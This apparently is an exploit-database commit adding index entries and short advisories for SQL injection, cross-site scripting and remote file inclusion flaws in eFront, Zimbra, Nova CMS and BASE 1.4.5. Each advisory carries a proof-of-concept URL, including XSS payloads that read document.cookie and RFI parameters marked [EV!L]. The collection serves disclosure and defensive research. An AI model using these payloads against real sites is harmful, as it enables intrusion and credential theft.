DB: 2015-04-12

38 new exploits

files.csv

@@ -33100,3 +33100,41 @@ id,file,description,date,author,platform,type,port
 36690,platforms/linux/remote/36690.rb,"Barracuda Firmware <= 5.0.0.012 reporting Post Auth Remote Root",2015-04-09,xort,linux,remote,8000
 36692,platforms/osx/local/36692.py,"Mac OS X rootpipe Local Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0
 36693,platforms/php/webapps/36693.txt,"RabbitWiki 'title' Parameter Cross Site Scripting Vulnerability",2012-02-10,sonyy,php,webapps,0
+36694,platforms/php/webapps/36694.txt,"eFront Community++ 3.6.10 SQL Injection and Multiple HTML Injection Vulnerabilities",2012-02-12,"Benjamin Kunz Mejri",php,webapps,0
+36695,platforms/php/webapps/36695.txt,"Zimbra 'view' Parameter Cross Site Scripting Vulnerability",2012-02-13,sonyy,php,webapps,0
+36696,platforms/php/webapps/36696.txt,"Nova CMS administrator/modules/moduleslist.php id Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36697,platforms/php/webapps/36697.txt,"Nova CMS optimizer/index.php fileType Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36698,platforms/php/webapps/36698.txt,"Nova CMS includes/function/gets.php filename Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36699,platforms/php/webapps/36699.txt,"Nova CMS includes/function/usertpl.php conf[blockfile] Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36700,platforms/windows/local/36700.txt,"Elipse SCADA 2.29 b141 - DLL Hijacking",2015-04-10,"PETER CHENG",windows,local,0
+36702,platforms/php/webapps/36702.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_db_setup.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36703,platforms/php/webapps/36703.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_graph_common.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36704,platforms/php/webapps/36704.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_graph_display.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36705,platforms/php/webapps/36705.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_graph_form.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36706,platforms/php/webapps/36706.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_graph_main.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36707,platforms/php/webapps/36707.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_local_rules.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36708,platforms/php/webapps/36708.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_logout.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36709,platforms/php/webapps/36709.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_main.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36710,platforms/php/webapps/36710.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_maintenance.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36711,platforms/php/webapps/36711.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_payload.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36712,platforms/php/webapps/36712.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 help/base_setup_help.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36713,platforms/php/webapps/36713.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_action.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36714,platforms/php/webapps/36714.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_cache.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36715,platforms/php/webapps/36715.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_db.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36716,platforms/php/webapps/36716.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_include.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36717,platforms/php/webapps/36717.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_output_html.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36718,platforms/php/webapps/36718.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_output_query.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36719,platforms/php/webapps/36719.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_state_criteria.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36720,platforms/php/webapps/36720.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_state_query.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36721,platforms/php/webapps/36721.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 setup/base_conf_contents.php Multiple Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36722,platforms/php/webapps/36722.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_state_common.inc.php GLOBALS[user_session_path] Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36723,platforms/php/webapps/36723.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 setup/setup2.php ado_inc_php Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36724,platforms/php/webapps/36724.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_ag_main.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36725,platforms/php/webapps/36725.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_qry_alert.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36726,platforms/php/webapps/36726.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_qry_common.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36727,platforms/php/webapps/36727.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_alerts.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36728,platforms/php/webapps/36728.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_class.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36729,platforms/php/webapps/36729.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_common.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36730,platforms/php/webapps/36730.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_ipaddr.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36731,platforms/php/webapps/36731.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_iplink.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36732,platforms/php/webapps/36732.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_ports.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0

platforms/php/webapps/36694.txt

@@ -0,0 +1,95 @@
+source: http://www.securityfocus.com/bid/51973/info
+
+eFront Community++ is prone to an SQL-injection vulnerability and multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
+
+Exploiting these issues may allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, execute HTML and script code in the context of the affected site, steal cookie-based authentication credentials, or control how the site is rendered to the user; other attacks are also possible.
+
+eFront Community++ 3.6.10 is vulnerable; other versions may also be affected. 
+
+SQL Injection:
+
+http://www.example.com/communityplusplus/www/administrator.php?ctg=course&edit_course=-1'[SQL INJECTION!]
+
+HTML Injection:
+
+The vulnerabilities can be exploited by remote attacker with low or high required user inter action.
+For demonstration or reproduce ...
+
+
+<td xmlns="http://www.w3.org/1999/xhtml" class="layoutColumn center">
+        <div id="messageBlock" class="block">
+        
+<div class="blockContents messageContents">
+         <table class="messageBlock">
+             <tbody><tr><td>
+<img title="_FAILURE" alt="_FAILURE" class="sprite32 sprite32-warning" src="themes/default/images/others/transparent.gif"/>
+</td>
+              <td class="failureBlock">.....Invalid login name: "> (403)  <a onclick="eF_js_showDivPopup('Error 
+Details', 2, 'error_details')" href="javascript:void(0)">More info</a></td>
+              <td><img onclick="window.Effect 
+? new Effect.Fade($('messageBlock')) : document.getElementById('messageBlock').style.display = 'none';" title="Close" 
+alt="Close" class="sprite32 sprite32-close" src="themes/default/images/others/transparent.gif"/></td></tr>
+            
+</tbody></table>
+        </div>
+        </div>  <table class="centerTable">
+
+...or 
+<tr class="oddRowColor">
+<td>
+<img title="Forum" alt="Forum" class="forumIcon sprite32 sprite32-forum" 
+src="themes/default/images/others/transparent.gif"/><div>
+<a href="/communityplusplus/www/administrator.php?ctg=
+forum&forum=6">"><iframe a="" <<="" onload='alert("VL")' src="a">
+                                 
+<p></p>
+                                </div>
+                            
+</td>
+<td>0 Subforums, 0 Topics, 0  Messages       
+</td>
+       <td><span class = "emptyCategory">Never</span>
+
+</td>
+       <td class = "centerAlign">
+
+
+...or
+<div>
+
+<a style="white-space: normal;" class="smallHeader" href="/communityplusplus/www/administrator.php
+?ctg=forum&poll=1">"><iframe a="" <<="" onload="alert(document.cookie)" src="a">
+                                                  <p><p>"><iframe src=a onload=alert(document....</p></div>
+
+</td>                                         
+
+...or    
+<tr class="oddRowColor defaultRowHeight">.....<td colspan="3" class="emptyCategory">No data found</td></tr>
+                                            
+<tr class="defaultRowHeight"><td colspan="4" class="sortedTableFooter"><div class="sortTablefilter"><span 
+id="languagesTable_currentFilter" style="display: none;">"><iframe span="" <<="" onload='alert("VL")' 
+src="a"/></span><input type="text" id="0_sortedTable_filter" onkeypress="if (event.which == 13 || event.keyCode == 13) 
+{eF_js_filterData(0); return false;}" value=""><iframe src=a onload=alert("VL") <" onclick='if 
+(this.value.match("Filter...")) this.value = "";'/></div><span style="vertical-align: middle;">Rows: </span><select 
+onchange="numRows = parseInt(this.options[this.selectedIndex].value);eF_js_changeRowsPerPage(0, numRows)"
+
+
+...or
+</tr><tr>
+
+<td class="calendar ">
+<a href="administrator.php?ctg=calendar&view_calendar=1327968000"/></td>
+<td class="calendar "><a href="administrator.php?ctg=calendar&view_calendar=1327968000"/></td>
+
+<td class="calendar ">
+                    <a href="administrator.php?ctg=calendar&view_calendar=1328054400">1</a></td>
+
+<td class="calendar ">
+                    <a href="administrator.php?ctg=calendar&view_calendar=1328140800">2</a></td>
+<td class="calendar ">
+                    <a href="administrator.php?ctg=calendar&view_calendar=1328227200">3</a></td>
+<td class="calendar ">
+                    <a href="administrator.php?ctg=calendar&view_calendar=1328313600">4</a></td>
+<td class="calendar ">
+                    <a href="administrator.php?ctg=calendar&view_calendar=1328400000">5</a></td>
+</tr>

platforms/php/webapps/36695.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/51974/info
+
+Zimbra is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/zimbra/h/calendar?view=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
+

platforms/php/webapps/36696.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51976/info
+
+Nova CMS is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. 
+
+http://www.example.com/novacms/administrator/modules/moduleslist.php?id=[EV!L] 

platforms/php/webapps/36697.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51976/info
+ 
+Nova CMS is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+ 
+Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
+ 
+http://www.example.com/novacms/optimizer/index.php?fileType=[EV!L] 

platforms/php/webapps/36698.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51976/info
+  
+Nova CMS is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+  
+Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
+  
+http://www.example.com/novacms/includes/function/gets.php?filename=[EV!L] 

platforms/php/webapps/36699.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51976/info
+   
+Nova CMS is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+   
+Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
+   
+http://www.example.com/novacms/includes/function/usertpl.php?conf[blockfile]=[EV!L] 

platforms/php/webapps/36702.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/51979/info
+
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+BASE 1.4.5 is vulnerable; other versions may be affected. 
+
+Function: include    File: base_db_setup.php            Line: 1
+Exploit: http://www.example.com/base/base_db_setup.php?BASE_path=[EV!L]

platforms/php/webapps/36703.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/51979/info
+ 
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+ 
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+ 
+BASE 1.4.5 is vulnerable; other versions may be affected. 
+
+Function: include_once    File: base_graph_common.php            Line: 1
+Exploit: http://www.example.com/base/base_graph_common.php?BASE_path=[EV!L]

platforms/php/webapps/36704.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/51979/info
+  
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+  
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+  
+BASE 1.4.5 is vulnerable; other versions may be affected. 
+
+Function: include    File: base_graph_display.php            Line: 2
+Exploit: http://www.example.com/base/base_graph_display.php?BASE_path=[EV!L]

platforms/php/webapps/36705.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/51979/info
+   
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+   
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+   
+BASE 1.4.5 is vulnerable; other versions may be affected. 
+
+Function: include_once    File: base_graph_form.php            Line: 1
+Exploit: http://www.example.com/base/base_graph_form.php?BASE_path=[EV!L]

platforms/php/webapps/36706.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/51979/info
+    
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+    
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+    
+BASE 1.4.5 is vulnerable; other versions may be affected. 
+
+Function: include    File: base_graph_main.php            Line: 1
+Exploit: http://www.example.com/base/base_graph_main.php?BASE_path=[EV!L]

platforms/php/webapps/36707.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/51979/info
+     
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+     
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+     
+BASE 1.4.5 is vulnerable; other versions may be affected. 
+
+Function: include_once    File: base_local_rules.php            Line: 1
+Exploit: http://www.example.com/base/base_local_rules.php?BASE_path=[EV!L]

platforms/php/webapps/36708.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/51979/info
+      
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+      
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+      
+BASE 1.4.5 is vulnerable; other versions may be affected. 
+
+Function: include_once    File: base_logout.php            Line: 1
+Exploit: http://www.example.com/base/base_logout.php?BASE_path=[EV!L]

platforms/php/webapps/36709.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/51979/info
+       
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+       
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+       
+BASE 1.4.5 is vulnerable; other versions may be affected. 
+
+Function: include    File: base_main.php            Line: 15
+Exploit: http://www.example.com/base/base_main.php?BASE_path=[EV!L]

platforms/php/webapps/36710.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51979/info
+        
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+        
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+        
+BASE 1.4.5 is vulnerable; other versions may be affected. 
+
+Exploit: http://www.example.com/base/base_maintenance.php?BASE_path=[EV!L]

platforms/php/webapps/36711.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51979/info
+         
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+         
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+         
+BASE 1.4.5 is vulnerable; other versions may be affected. 
+
+Exploit: http://www.example.com/base/base_payload.php?BASE_path=[EV!L]

platforms/php/webapps/36712.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51979/info
+          
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+          
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+          
+BASE 1.4.5 is vulnerable; other versions may be affected. 
+
+Exploit: http://www.example.com/base/help/base_setup_help.php?BASE_path=[EV!L]

platforms/php/webapps/36713.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51979/info
+           
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+           
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+           
+BASE 1.4.5 is vulnerable; other versions may be affected. 
+
+Exploit: http://www.example.com/base/includes/base_action.inc.php?BASE_path=[EV!L]

platforms/php/webapps/36714.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51979/info
+            
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+            
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+            
+BASE 1.4.5 is vulnerable; other versions may be affected. 
+
+Exploit: http://www.example.com/base/includes/base_cache.inc.php?BASE_path=[EV!L]

platforms/php/webapps/36715.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51979/info
+             
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+             
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+             
+BASE 1.4.5 is vulnerable; other versions may be affected. 
+
+Exploit: http://www.example.com/base/includes/base_db.inc.php?path=[EV!L]

platforms/php/webapps/36716.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51979/info
+              
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+              
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+              
+BASE 1.4.5 is vulnerable; other versions may be affected. 
+
+Exploit: http://www.example.com/base/includes/base_include.inc.php?BASE_path=[EV!L]

platforms/php/webapps/36717.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51979/info
+               
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+               
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+               
+BASE 1.4.5 is vulnerable; other versions may be affected. 
+
+Exploit: http://www.example.com/base/includes/base_output_html.inc.php?BASE_path=[EV!L]

platforms/php/webapps/36718.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51979/info
+                
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+                
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+                
+BASE 1.4.5 is vulnerable; other versions may be affected. 
+
+Exploit: http://www.example.com/base/includes/base_output_query.inc.php?BASE_path=[EV!L]

platforms/php/webapps/36719.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51979/info
+                 
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+                 
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+                 
+BASE 1.4.5 is vulnerable; other versions may be affected.
+
+Exploit: http://www.example.com/base/includes/base_state_criteria.inc.php?BASE_path=[EV!L]

platforms/php/webapps/36720.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51979/info
+                  
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+                  
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+                  
+BASE 1.4.5 is vulnerable; other versions may be affected.
+
+Exploit: http://www.example.com/base/includes/base_state_query.inc.php?BASE_path=[EV!L]

platforms/php/webapps/36721.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51979/info
+                   
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+                   
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+                   
+BASE 1.4.5 is vulnerable; other versions may be affected.
+
+Exploit: http://www.example.com/base/setup/base_conf_contents.php?BASE_Language=[EV!L]

platforms/php/webapps/36722.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51979/info
+                    
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+                    
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+                    
+BASE 1.4.5 is vulnerable; other versions may be affected.
+
+Exploit: http://www.example.com/base/includes/base_state_common.inc.php?GLOBALS[user_session_path]=[EV!L]

platforms/php/webapps/36723.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51979/info
+                     
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+                     
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+                     
+BASE 1.4.5 is vulnerable; other versions may be affected.
+
+Exploit: http://www.example.com/base/setup/setup2.php?ado_inc_php=[EV!L]

platforms/php/webapps/36724.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51979/info
+                      
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+                      
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+                      
+BASE 1.4.5 is vulnerable; other versions may be affected.
+
+Exploit: http://www.example.com/base/base_ag_main.php?BASE_path=[EV!L]

platforms/php/webapps/36725.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51979/info
+                       
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+                       
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+                       
+BASE 1.4.5 is vulnerable; other versions may be affected.
+
+Exploit: http://www.example.com/base/base_qry_alert.php?BASE_path=[EV!L]

platforms/php/webapps/36726.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51979/info
+                        
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+                        
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+                        
+BASE 1.4.5 is vulnerable; other versions may be affected.
+
+Exploit: http://www.example.com/base/base_qry_common.php?BASE_path=[EV!L]

platforms/php/webapps/36727.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51979/info
+                         
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+                         
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+                         
+BASE 1.4.5 is vulnerable; other versions may be affected.
+
+Exploit: http://www.example.com/base/base_stat_alerts.php?BASE_path=[EV!L]

platforms/php/webapps/36728.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51979/info
+                          
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+                          
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+                          
+BASE 1.4.5 is vulnerable; other versions may be affected.
+
+Exploit: http://www.example.com/base/base_stat_class.php?BASE_path=[EV!L]

platforms/php/webapps/36729.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51979/info
+                           
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+                           
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+                           
+BASE 1.4.5 is vulnerable; other versions may be affected.
+
+Exploit: http://www.example.com/base/base_stat_common.php?BASE_path=[EV!L]

platforms/php/webapps/36730.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51979/info
+                            
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+                            
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+                            
+BASE 1.4.5 is vulnerable; other versions may be affected.
+
+Exploit: http://www.example.com/base/base_stat_ipaddr.php?BASE_path=[EV!L]

platforms/php/webapps/36731.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51979/info
+                             
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+                             
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+                             
+BASE 1.4.5 is vulnerable; other versions may be affected.
+
+Exploit: http://www.example.com/base/base_stat_iplink.php?BASE_path=[EV!L]

platforms/php/webapps/36732.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51979/info
+                              
+BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
+                              
+An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+                              
+BASE 1.4.5 is vulnerable; other versions may be affected.
+
